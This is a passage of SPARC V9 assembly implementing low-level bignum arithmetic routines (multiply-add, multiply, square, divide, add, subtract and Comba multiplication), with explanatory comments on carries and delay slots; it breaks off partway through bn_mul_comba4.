 * leftovers.  Branches with the ",a" (annul) bit execute their
 * delay-slot load only when the branch is taken, pre-loading the first
 * operand word for the target block.
 */
bn_mul_add_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_mul_add_words_proceed
lduw [%o1],%g2 ! (annulled) pre-load ap[0] only if num > 0
retl ! num <= 0: return 0
clr %o0
nop
nop
nop
.L_bn_mul_add_words_proceed:
srl %o3,%g0,%o3 ! clruw %o3
andcc %o2,-4,%g0 ! at least 4 words left?
bz,pn %icc,.L_bn_mul_add_words_tail
clr %o5 ! carry = 0
.L_bn_mul_add_words_loop: ! wow! 32 aligned!
lduw [%o0],%g1
lduw [%o1+4],%g3
mulx %o3,%g2,%g2 ! 32x32 -> 64 product
add %g1,%o5,%o4 ! rp word + carry
nop
add %o4,%g2,%o4 ! ... + product
stuw %o4,[%o0]
srlx %o4,32,%o5 ! next carry
lduw [%o0+4],%g1
lduw [%o1+8],%g2
mulx %o3,%g3,%g3
add %g1,%o5,%o4
dec 4,%o2
add %o4,%g3,%o4
stuw %o4,[%o0+4]
srlx %o4,32,%o5
lduw [%o0+8],%g1
lduw [%o1+12],%g3
mulx %o3,%g2,%g2
add %g1,%o5,%o4
inc 16,%o1
add %o4,%g2,%o4
stuw %o4,[%o0+8]
srlx %o4,32,%o5
lduw [%o0+12],%g1
mulx %o3,%g3,%g3
add %g1,%o5,%o4
inc 16,%o0
add %o4,%g3,%o4
andcc %o2,-4,%g0
stuw %o4,[%o0-4]
srlx %o4,32,%o5
bnz,a,pt %icc,.L_bn_mul_add_words_loop
lduw [%o1],%g2 ! (annulled) pre-load for next iteration
brnz,a,pn %o2,.L_bn_mul_add_words_tail
lduw [%o1],%g2 ! (annulled) pre-load for tail
.L_bn_mul_add_words_return:
retl
mov %o5,%o0 ! return carry
.L_bn_mul_add_words_tail:
lduw [%o0],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
dec %o2
add %o4,%g2,%o4
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_add_words_return
stuw %o4,[%o0] ! delay slot: store executes on both paths
lduw [%o1+4],%g2
lduw [%o0+4],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
dec %o2
add %o4,%g2,%o4
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_add_words_return
stuw %o4,[%o0+4]
lduw [%o1+8],%g2
lduw [%o0+8],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
add %o4,%g2,%o4
stuw %o4,[%o0+8]
retl
srlx %o4,32,%o0 ! return carry
.type bn_mul_add_words,#function
.size bn_mul_add_words,(.-bn_mul_add_words)
.align 32
.global bn_mul_words
/*
 * BN_ULONG bn_mul_words(rp,ap,num,w)
 * BN_ULONG *rp,*ap;
 * int num;
 * BN_ULONG w;
 *
 * rp[i] = ap[i]*w for i in [0,num); returns the final carry word.
 * Same structure as bn_mul_add_words above, minus the read of the
 * destination: %o0=rp, %o1=ap, %o2=num, %o3=w, %o5=running carry.
 * Annulled (",a") branch delay slots pre-load the next ap word only
 * when the branch is taken.
 */
bn_mul_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_mul_words_proceeed
lduw [%o1],%g2 ! (annulled) pre-load ap[0] only if num > 0
retl ! num <= 0: return 0
clr %o0
nop
nop
nop
.L_bn_mul_words_proceeed:
srl %o3,%g0,%o3 ! clruw %o3
andcc %o2,-4,%g0
bz,pn %icc,.L_bn_mul_words_tail
clr %o5 ! carry = 0
.L_bn_mul_words_loop: ! wow! 32 aligned!
lduw [%o1+4],%g3
mulx %o3,%g2,%g2 ! 32x32 -> 64 product
add %g2,%o5,%o4 ! product + carry
nop
stuw %o4,[%o0]
srlx %o4,32,%o5 ! next carry
lduw [%o1+8],%g2
mulx %o3,%g3,%g3
add %g3,%o5,%o4
dec 4,%o2
stuw %o4,[%o0+4]
srlx %o4,32,%o5
lduw [%o1+12],%g3
mulx %o3,%g2,%g2
add %g2,%o5,%o4
inc 16,%o1
stuw %o4,[%o0+8]
srlx %o4,32,%o5
mulx %o3,%g3,%g3
add %g3,%o5,%o4
inc 16,%o0
stuw %o4,[%o0-4]
srlx %o4,32,%o5
andcc %o2,-4,%g0
bnz,a,pt %icc,.L_bn_mul_words_loop
lduw [%o1],%g2 ! (annulled) pre-load for next iteration
nop
nop
brnz,a,pn %o2,.L_bn_mul_words_tail
lduw [%o1],%g2 ! (annulled) pre-load for tail
.L_bn_mul_words_return:
retl
mov %o5,%o0 ! return carry
.L_bn_mul_words_tail:
mulx %o3,%g2,%g2
add %g2,%o5,%o4
dec %o2
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_words_return
stuw %o4,[%o0] ! delay slot: store executes on both paths
lduw [%o1+4],%g2
mulx %o3,%g2,%g2
add %g2,%o5,%o4
dec %o2
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_words_return
stuw %o4,[%o0+4]
lduw [%o1+8],%g2
mulx %o3,%g2,%g2
add %g2,%o5,%o4
stuw %o4,[%o0+8]
retl
srlx %o4,32,%o0 ! return carry
.type bn_mul_words,#function
.size bn_mul_words,(.-bn_mul_words)
.align 32
.global bn_sqr_words
/*
 * void bn_sqr_words(r,a,n)
 * BN_ULONG *r,*a;
 * int n;
 *
 * For i in [0,n): r[2i] = low32(a[i]^2), r[2i+1] = high32(a[i]^2).
 * No carry propagates between words, so no carry register is needed.
 * %o0=r, %o1=a, %o2=n, %g2/%g3=current input words, %o4/%o5=square.
 * Returns 0 in %o0 (callers treat the return value as void).
 */
bn_sqr_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_sqr_words_proceeed
lduw [%o1],%g2 ! (annulled) pre-load a[0] only if n > 0
retl ! n <= 0: nothing to do
clr %o0
nop
nop
nop
.L_bn_sqr_words_proceeed:
andcc %o2,-4,%g0
nop
bz,pn %icc,.L_bn_sqr_words_tail
nop
.L_bn_sqr_words_loop: ! wow! 32 aligned!
lduw [%o1+4],%g3
mulx %g2,%g2,%o4 ! a[i]^2, 64-bit
stuw %o4,[%o0]
srlx %o4,32,%o5
stuw %o5,[%o0+4]
nop
lduw [%o1+8],%g2
mulx %g3,%g3,%o4
dec 4,%o2
stuw %o4,[%o0+8]
srlx %o4,32,%o5
stuw %o5,[%o0+12]
lduw [%o1+12],%g3
mulx %g2,%g2,%o4
srlx %o4,32,%o5
stuw %o4,[%o0+16]
inc 16,%o1
stuw %o5,[%o0+20]
mulx %g3,%g3,%o4
inc 32,%o0
stuw %o4,[%o0-8]
srlx %o4,32,%o5
andcc %o2,-4,%g2 ! NOTE: clobbers %g2, harmless -- both successor
stuw %o5,[%o0-4] ! paths reload %g2 in their annulled delay slot
bnz,a,pt %icc,.L_bn_sqr_words_loop
lduw [%o1],%g2 ! (annulled) pre-load for next iteration
nop
brnz,a,pn %o2,.L_bn_sqr_words_tail
lduw [%o1],%g2 ! (annulled) pre-load for tail
.L_bn_sqr_words_return:
retl
clr %o0
.L_bn_sqr_words_tail:
mulx %g2,%g2,%o4
dec %o2
stuw %o4,[%o0]
srlx %o4,32,%o5
brz,pt %o2,.L_bn_sqr_words_return
stuw %o5,[%o0+4] ! delay slot: store executes on both paths
lduw [%o1+4],%g2
mulx %g2,%g2,%o4
dec %o2
stuw %o4,[%o0+8]
srlx %o4,32,%o5
brz,pt %o2,.L_bn_sqr_words_return
stuw %o5,[%o0+12]
lduw [%o1+8],%g2
mulx %g2,%g2,%o4
srlx %o4,32,%o5
stuw %o4,[%o0+16]
stuw %o5,[%o0+20]
retl
clr %o0
.type bn_sqr_words,#function
.size bn_sqr_words,(.-bn_sqr_words)
.align 32
.global bn_div_words
/*
 * BN_ULONG bn_div_words(h,l,d)
 * BN_ULONG h,l,d;
 *
 * Returns ((h << 32) | l) / d, truncated to 32 bits.
 * %o0=h, %o1=l, %o2=d.  No guard against d == 0 or against a quotient
 * that does not fit in 32 bits -- NOTE(review): presumably guaranteed
 * by the BN-layer callers; confirm before reusing elsewhere.
 */
bn_div_words:
sllx %o0,32,%o0 ! build 64-bit dividend h:l in %o0
or %o0,%o1,%o0
udivx %o0,%o2,%o0 ! unsigned 64-bit divide
retl
srl %o0,%g0,%o0 ! clruw %o0
.type bn_div_words,#function
.size bn_div_words,(.-bn_div_words)
.align 32
.global bn_add_words
/*
 * BN_ULONG bn_add_words(rp,ap,bp,n)
 * BN_ULONG *rp,*ap,*bp;
 * int n;
 *
 * rp[i] = ap[i] + bp[i] + carry for i in [0,n); returns the final
 * carry (0 or 1).  %o0=rp, %o1=ap, %o2=bp, %o3=n.
 * The carry is kept in the integer condition codes: addccc consumes
 * and produces the carry flag, so no instruction that writes the flags
 * may be scheduled between the adds (only loads/stores/inc are).
 * The return sequence "clr %o0; retl; movcs %icc,1,%o0" materialises
 * the flag: clr does not touch the condition codes, and the movcs in
 * the retl delay slot sets %o0=1 iff carry is set.
 */
bn_add_words:
sra %o3,%g0,%o3 ! signx %o3
brgz,a %o3,.L_bn_add_words_proceed
lduw [%o1],%o4 ! (annulled) pre-load ap[0] only if n > 0
retl ! n <= 0: return 0
clr %o0
.L_bn_add_words_proceed:
andcc %o3,-4,%g0
bz,pn %icc,.L_bn_add_words_tail
addcc %g0,0,%g0 ! clear carry flag
.L_bn_add_words_loop: ! wow! 32 aligned!
dec 4,%o3
lduw [%o2],%o5
lduw [%o1+4],%g1
lduw [%o2+4],%g2
lduw [%o1+8],%g3
lduw [%o2+8],%g4
addccc %o5,%o4,%o5 ! add with carry in and out
stuw %o5,[%o0]
lduw [%o1+12],%o4
lduw [%o2+12],%o5
inc 16,%o1
addccc %g1,%g2,%g1
stuw %g1,[%o0+4]
inc 16,%o2
addccc %g3,%g4,%g3
stuw %g3,[%o0+8]
inc 16,%o0
addccc %o5,%o4,%o5
stuw %o5,[%o0-4]
and %o3,-4,%g1 ! "and" (not andcc): must preserve the carry flag
brnz,a,pt %g1,.L_bn_add_words_loop
lduw [%o1],%o4 ! (annulled) pre-load for next iteration
brnz,a,pn %o3,.L_bn_add_words_tail
lduw [%o1],%o4 ! (annulled) pre-load for tail
.L_bn_add_words_return:
clr %o0
retl
movcs %icc,1,%o0 ! delay slot: %o0 = 1 if carry set
nop
.L_bn_add_words_tail:
lduw [%o2],%o5
dec %o3
addccc %o5,%o4,%o5
brz,pt %o3,.L_bn_add_words_return
stuw %o5,[%o0] ! delay slot: store executes on both paths
lduw [%o1+4],%o4
lduw [%o2+4],%o5
dec %o3
addccc %o5,%o4,%o5
brz,pt %o3,.L_bn_add_words_return
stuw %o5,[%o0+4]
lduw [%o1+8],%o4
lduw [%o2+8],%o5
addccc %o5,%o4,%o5
stuw %o5,[%o0+8]
clr %o0
retl
movcs %icc,1,%o0
.type bn_add_words,#function
.size bn_add_words,(.-bn_add_words)
.global bn_sub_words
/*
 * BN_ULONG bn_sub_words(rp,ap,bp,n)
 * BN_ULONG *rp,*ap,*bp;
 * int n;
 *
 * rp[i] = ap[i] - bp[i] - borrow for i in [0,n); returns the final
 * borrow (0 or 1).  %o0=rp, %o1=ap, %o2=bp, %o3=n.
 * Mirror image of bn_add_words above: subccc chains the borrow through
 * the carry flag, so nothing between the subtracts may write the
 * condition codes; "clr %o0; retl; movcs %icc,1,%o0" turns the final
 * flag into the return value.
 */
bn_sub_words:
sra %o3,%g0,%o3 ! signx %o3
brgz,a %o3,.L_bn_sub_words_proceed
lduw [%o1],%o4 ! (annulled) pre-load ap[0] only if n > 0
retl ! n <= 0: return 0
clr %o0
.L_bn_sub_words_proceed:
andcc %o3,-4,%g0
bz,pn %icc,.L_bn_sub_words_tail
addcc %g0,0,%g0 ! clear carry (borrow) flag
.L_bn_sub_words_loop: ! wow! 32 aligned!
dec 4,%o3
lduw [%o2],%o5
lduw [%o1+4],%g1
lduw [%o2+4],%g2
lduw [%o1+8],%g3
lduw [%o2+8],%g4
subccc %o4,%o5,%o5 ! subtract with borrow in and out
stuw %o5,[%o0]
lduw [%o1+12],%o4
lduw [%o2+12],%o5
inc 16,%o1
subccc %g1,%g2,%g2
stuw %g2,[%o0+4]
inc 16,%o2
subccc %g3,%g4,%g4
stuw %g4,[%o0+8]
inc 16,%o0
subccc %o4,%o5,%o5
stuw %o5,[%o0-4]
and %o3,-4,%g1 ! "and" (not andcc): must preserve the borrow flag
brnz,a,pt %g1,.L_bn_sub_words_loop
lduw [%o1],%o4 ! (annulled) pre-load for next iteration
brnz,a,pn %o3,.L_bn_sub_words_tail
lduw [%o1],%o4 ! (annulled) pre-load for tail
.L_bn_sub_words_return:
clr %o0
retl
movcs %icc,1,%o0 ! delay slot: %o0 = 1 if borrow set
nop
.L_bn_sub_words_tail: ! wow! 32 aligned!
lduw [%o2],%o5
dec %o3
subccc %o4,%o5,%o5
brz,pt %o3,.L_bn_sub_words_return
stuw %o5,[%o0] ! delay slot: store executes on both paths
lduw [%o1+4],%o4
lduw [%o2+4],%o5
dec %o3
subccc %o4,%o5,%o5
brz,pt %o3,.L_bn_sub_words_return
stuw %o5,[%o0+4]
lduw [%o1+8],%o4
lduw [%o2+8],%o5
subccc %o4,%o5,%o5
stuw %o5,[%o0+8]
clr %o0
retl
movcs %icc,1,%o0
.type bn_sub_words,#function
.size bn_sub_words,(.-bn_sub_words)
/*
* Code below depends on the fact that upper parts of the %l0-%l7
* and %i0-%i7 are zeroed by kernel after context switch. In
* previous versions this comment stated that "the trouble is that
* it's not feasible to implement the mumbo-jumbo in less V9
* instructions:-(" which apparently isn't true thanks to
* 'bcs,a %xcc,.+8; inc %rd' pair. But the performance improvement
* results not from the shorter code, but from elimination of
* multicycle non-pairable 'rd %y,%rd' instructions.
*
* Andy.
*/
#define FRAME_SIZE -96
/*
* Here is register usage map for *all* routines below.
*/
#define t_1 %o0
#define t_2 %o1
#define c_12 %o2
#define c_3 %o3
#define ap(I) [%i1+4*I]
#define bp(I) [%i2+4*I]
#define rp(I) [%i0+4*I]
#define a_0 %l0
#define a_1 %l1
#define a_2 %l2
#define a_3 %l3
#define a_4 %l4
#define a_5 %l5
#define a_6 %l6
#define a_7 %l7
#define b_0 %i3
#define b_1 %i4
#define b_2 %i5
#define b_3 %o4
#define b_4 %o5
#define b_5 %o7
#define b_6 %g1
#define b_7 %g4
.align 32
.global bn_mul_comba8
/*
* void bn_mul_comba8(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba8:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw bp(0),b_0 !=
lduw bp(1),b_1
mulx a_0,b_0,t_1 !mul_add_c(a[0],b[0],c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !=!r[0]=c1;
lduw ap(1),a_1
mulx a_0,b_1,t_1 !mul_add_c(a[0],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(2),a_2
mulx a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(2),b_2 !=
mulx a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(3),b_3
mulx a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12 !=
mulx a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_2,t_1 !=!mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(4),a_4
mulx a_3,b_0,t_1 !=!mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_4,b_0,t_1 !mul_add_c(a[4],b[0],c2,c3,c1);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_1,t_1 !=!mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_2,t_1 !=!mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(4),b_4 !=
mulx a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(5),b_5
mulx a_0,b_4,t_1 !mul_add_c(a[0],b[4],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12 !=
mulx a_0,b_5,t_1 !mul_add_c(a[0],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_4,t_1 !mul_add_c(a[1],b[4],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(5),a_5
mulx a_4,b_1,t_1 !mul_add_c(a[4],b[1],c3,c1,c2);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(6),a_6
mulx a_5,b_0,t_1 !=!mul_add_c(a[5],b[0],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_6,b_0,t_1 !mul_add_c(a[6],b[0],c1,c2,c3);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,b_1,t_1 !=!mul_add_c(a[5],b[1],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,b_2,t_1 !=!mul_add_c(a[4],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_3,t_1 !=!mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_4,t_1 !=!mul_add_c(a[2],b[4],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(6),b_6 !=
mulx a_1,b_5,t_1 !mul_add_c(a[1],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(7),b_7
mulx a_0,b_6,t_1 !mul_add_c(a[0],b[6],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
or c_12,c_3,c_12 !=
mulx a_0,b_7,t_1 !mul_add_c(a[0],b[7],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_6,t_1 !mul_add_c(a[1],b[6],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_2,b_5,t_1 !mul_add_c(a[2],b[5],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_4,t_1 !mul_add_c(a[3],b[4],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_3,t_1 !mul_add_c(a[4],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_2,t_1 !mul_add_c(a[5],b[2],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(7),a_7
mulx a_6,b_1,t_1 !=!mul_add_c(a[6],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_7,b_0,t_1 !=!mul_add_c(a[7],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(7) !r[7]=c2;
or c_12,c_3,c_12
mulx a_7,b_1,t_1 !=!mul_add_c(a[7],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_6,b_2,t_1 !mul_add_c(a[6],b[2],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_5,b_3,t_1 !mul_add_c(a[5],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_4,b_4,t_1 !mul_add_c(a[4],b[4],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_3,b_5,t_1 !mul_add_c(a[3],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_2,b_6,t_1 !mul_add_c(a[2],b[6],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_1,b_7,t_1 !mul_add_c(a[1],b[7],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
srlx t_1,32,c_12
stuw t_1,rp(8) !r[8]=c3;
or c_12,c_3,c_12
mulx a_2,b_7,t_1 !=!mul_add_c(a[2],b[7],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_3,b_6,t_1 !mul_add_c(a[3],b[6],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_5,t_1 !mul_add_c(a[4],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_4,t_1 !mul_add_c(a[5],b[4],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_3,t_1 !mul_add_c(a[6],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_2,t_1 !mul_add_c(a[7],b[2],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(9) !r[9]=c1;
or c_12,c_3,c_12 !=
mulx a_7,b_3,t_1 !mul_add_c(a[7],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_4,t_1 !mul_add_c(a[6],b[4],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_5,t_1 !mul_add_c(a[5],b[5],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_6,t_1 !mul_add_c(a[4],b[6],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_7,t_1 !mul_add_c(a[3],b[7],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(10) !r[10]=c2;
or c_12,c_3,c_12 !=
mulx a_4,b_7,t_1 !mul_add_c(a[4],b[7],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_6,t_1 !mul_add_c(a[5],b[6],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_5,t_1 !mul_add_c(a[6],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_4,t_1 !mul_add_c(a[7],b[4],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(11) !r[11]=c3;
or c_12,c_3,c_12 !=
mulx a_7,b_5,t_1 !mul_add_c(a[7],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_6,t_1 !mul_add_c(a[6],b[6],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_7,t_1 !mul_add_c(a[5],b[7],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(12) !r[12]=c1;
or c_12,c_3,c_12 !=
mulx a_6,b_7,t_1 !mul_add_c(a[6],b[7],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_6,t_1 !mul_add_c(a[7],b[6],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
st t_1,rp(13) !r[13]=c2;
or c_12,c_3,c_12 !=
mulx a_7,b_7,t_1 !mul_add_c(a[7],b[7],c3,c1,c2);
addcc c_12,t_1,t_1
srlx t_1,32,c_12 !=
stuw t_1,rp(14) !r[14]=c3;
stuw c_12,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0 !=
.type bn_mul_comba8,#function
.size bn_mul_comba8,(.-bn_mul_comba8)
.align 32
.global bn_mul_comba4
/*
* void bn_mul_comba4(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba4:
save %sp,FRAME_SIZE,%sp
lduw ap(0),a_0
mov 1,t_2
lduw bp(0),b_0
sllx t_2,32,t_2 !=
lduw bp(1),b_1
mulx a_0,b_0,t_1 !mul_add_c(a[0],b[0],c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !=!r[0]=c1;
lduw ap(1),a_1
mulx a_0,b_1,t_1 !mul_add_c(a[0],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(2),a_2
mulx a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(2),b_2 !=
mulx a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(3),b_3
mulx a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12 !=
mulx a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_2,t_1 !mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_0,t_1 !mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
